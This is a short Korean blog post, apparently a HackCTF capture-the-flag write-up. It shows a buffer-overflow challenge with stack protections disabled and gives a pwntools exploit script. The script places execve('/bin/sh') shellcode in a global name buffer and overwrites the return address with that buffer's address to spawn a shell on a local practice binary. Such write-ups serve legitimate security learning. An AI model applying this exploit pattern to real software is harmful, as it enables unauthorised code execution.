
[hackctf] 내 버퍼가 흘러넘친다
sangjuns
·2021. 4. 18. 17:20
문제 소스
보호기법
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : disabled
PIE : disabled
RELRO : Partial
문제 분석 및 페이로드
from pwn import *
context.arch='x86'
p=process("./prob1")
e=ELF("./prob1")
name=e.symbols['name']
shell=asm(shellcraft.execve("/bin/sh",0,0))
pay="A"*24
pay+=p32(name)
p.sendafter("Name : ",shell)
p.sendlineafter("input : ",pay)
참고문헌 및 힘들었던 부분
'War Games > hack-ctf' 카테고리의 다른 글
[hackctf] x64 Simple_size_BOF (0) | 2021.04.18 |
---|---|
[hackctf] x64 Buffer Overflow (0) | 2021.04.18 |
[hackctf] basic_fsb (0) | 2021.04.18 |
[hackctf] bof_basic #2 (0) | 2021.04.18 |
[hackctf] bof_basic #1 (0) | 2021.04.18 |